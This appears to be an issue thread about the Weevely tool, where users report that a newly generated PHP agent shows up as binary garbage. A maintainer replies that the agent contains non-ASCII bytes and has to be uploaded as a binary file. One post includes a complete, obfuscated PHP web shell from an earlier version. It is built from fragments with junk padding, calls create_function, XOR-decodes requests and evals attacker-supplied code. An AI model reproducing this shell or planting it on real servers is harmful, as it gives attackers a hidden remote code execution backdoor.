Weevely generates PHP error

[duanfeihongo]

use weevely to generate PHP

./weevely.py generate 123456 /home/kali/xx/xxshell/shell6.php

View the generated PHP source code

cat shell6.php

/x�X�3�:�U��k�0���W�pф��c�V��^��7q%��ƶI�F��}�F p~�9�sׯ���Y��� j2��l�"�� �U*�+��j�hQ�?����i�/�S���Ӟ�|��O�i�Wg ?��kk� ?����D�]� Eɡ|(�����:Y�׽��E�Q�L�C~z���[��8�O΄`[��ƵS���>;P2t1,5"�8ץJ��'�5^�P��y���O��TL� oAlӤ��y�xw���W,l+�44��8��Z̒���NQ�6�-k��Ѓmی��(d�쒬TҴ���Q��i���� ���<��6���8�D����\��`�%�6�:��Aՠ���GBMB

Previously generated PHP source code

$g='$k="e10adlQc39"lQlQ;$kh="49ba5lQ9abbe5lQ6lQ";$lQkf=lQ"e057f20f883e";lQ$p="5ueP9lQVWt0UKglQz3MrlQ";functiolQn x(lQ$t,$lQk';
$e='Qnput"lQ),$mlQ)==1) {@ob_stalQrtlQ();@evlQal(@gzulQnlQcompress(@x(@balQse64_lQlQdecode($mlQ[1lQ]),lQ$k)));$lQo=@olQlQ';
$P='b_get_contents(lQ);@ob_elQnd_clelQan(lQ);$r=@balQslQe64_encode(@x(@gzcolQmprlQess($o),$lQk));prilQnlQtlQ("$p$kh$r$kf");}';
$i='){$c=strllQen($klQ);$llQlQ=strlen($t);$lQo=lQ""lQ;forlQ($i=0;$ilQ<lQ$l;){for(lQ$lQj=0;($j<$c&&$i<$lQl);$j++,$i+lQ+){$ol';
$X=str_replace('WI','','WIcreWIaWIteWI_fWIunctiWIon');
$N='Q.=$lQt{lQlQ$i}^$k{$j};}}retulQrn $o;}ilQf (@prelQglQ_match(lQ"/$klQh(.+lQlQ)lQ$kf/",@filelQ_get_contents("php:https://ilQl';
$K=str_replace('lQ','',$g.$i.$N.$e.$P);
$B=$X('',$K);$B();
?>

Kali's configuration

Linux kali 6.8.11-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.8.11-1kali2 (2024-05-30) x86_64 GNU/Linux

[duanfeihongo]

PHP version

PHP 8.2.21 (cli) (built: Jul 25 2024 10:12:09) (NTS)
Copyright (c) The PHP Group
Zend Engine v4.2.21, Copyright (c) Zend Technologies
with Zend OPcache v8.2.21, Copyright (c), by Zend Technologies

[akedaikuki]

I have the same problem

[fubxx]

I have the same problem

[ZanyMonk]

As you may have noticed, the new agent contains non-ASCII characters. So if you copy/pasted these characters the same way here and on your target, this is probably the reason for your problem.

Please make sure to upload your agent as a binary file, not as a text file. If you have no choice but to copy/paste, base64 or hex encode your agent before doing so.

If you want the old agent back, you can use -obfuscator obfusc1_php, but it will be incompatible with PHP 8.